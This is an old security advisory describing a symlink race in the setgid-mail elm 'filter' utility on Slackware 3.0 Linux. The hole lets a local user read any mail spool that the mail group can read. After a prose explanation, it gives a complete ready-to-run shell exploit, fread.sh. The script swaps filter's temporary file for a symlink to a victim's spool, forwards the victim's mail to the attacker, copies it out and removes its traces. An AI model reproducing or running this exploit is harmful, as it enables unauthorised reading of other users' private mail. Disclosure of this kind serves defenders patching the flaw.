The elm filter under linux runs sugrp mail, thus allowing it to freely read and write from users mail spools. It is only through the integrity of its code that the security of linux's mail system is protected; and in this respect it falls short. The failure of the filter program to properly handle temporary files allows a user to read or write to any user's mail spool, a significant security hole. The specific problem that is exploited in this hole is the way filter uses a temporary file to store the input to it, and then subsequently send it back out according to the filter. Because of the modularity of the coding, in the main filter.c, the temporary file is opened, and then written to; after which it is closed. The mailmessage function is then called, with the purpose of forwarding that mail, written to the temporary file, to whatever destination is specified in the filter. At the start of this process, the temporary file is opened, and the contents of it are dumped to the mail spool of the user the mail is being forwarded to. At any point after the file has been initially opened by the main filter function, since the user running filter has permissions on that temp file, it can be rm'd. The temp file existing can then be replaced with a symbolic link to any file that group mail has read permissions on. When it is opened in the mailmessage function, the symbolic link is followed and whatever file that was pointed to will be read in, and the contents forwarded to the user specified in the mail spool. The complete exploits are shown below: Program: filter, an elm utility Affected Operating Systems: linux - Slackware 3.0, others with sgid mail filter Requirements: account on machine Security Compromise: user can read any mail spool readable by grp mail. (usually everything, sometimes not root) Author: Dave M. (davem@cmu.edu) Synopsis: filter writes out the mail to be forwarded to a temporary file, which is then closed and reopened; if when the temporary file is reopened it is a symlink to a mail spool, filter will proceed to forward the contents of that file as if it was the original message. #!/bin/sh # This shell script exploits a problem with filter(1L) # it will follow symbolic links, on a read allowing # us to steal a users mail file. # # Usage: fread.sh victimsusername # # Contents will be stored in ~/victimsusername.mail # # Dave M. (davem@cmu.edu) # cp /var/spool/mail/$LOGNAME ~ cp /dev/null /var/spool/mail/$LOGNAME echo 'if (always) forward' $LOGNAME > /tmp/fread-ftr.tmp cat << _EOF_ >> /tmp/fread-msg.tmp From: Dave To: $LOGNAME Subject: Filter Exploit _EOF_ echo sleep 2 > /tmp/fread-sh.tmp echo cat /tmp/fread-msg.tmp >> /tmp/fread-sh.tmp chmod +x /tmp/fread-sh.tmp /tmp/fread-sh.tmp|filter -f /tmp/fread-ftr.tmp & FREAD=`ps|grep 'filter -f'|grep -v grep|awk '{print $1}'` rm -f /tmp/filter.$FREAD ln -s /var/spool/mail/$1 /tmp/filter.$FREAD sleep 2 rm -f /tmp/fread-ftr.tmp /tmp/fread-msg.tmp /tmp/fread-sh.tmp /tmp/fread-ftr.tmp /tmp/filter.$FREAD FREAD= cp /var/spool/mail/$LOGNAME ~/$1.mail cp ~/$LOGNAME /var/spool/mail more ~/$1.mail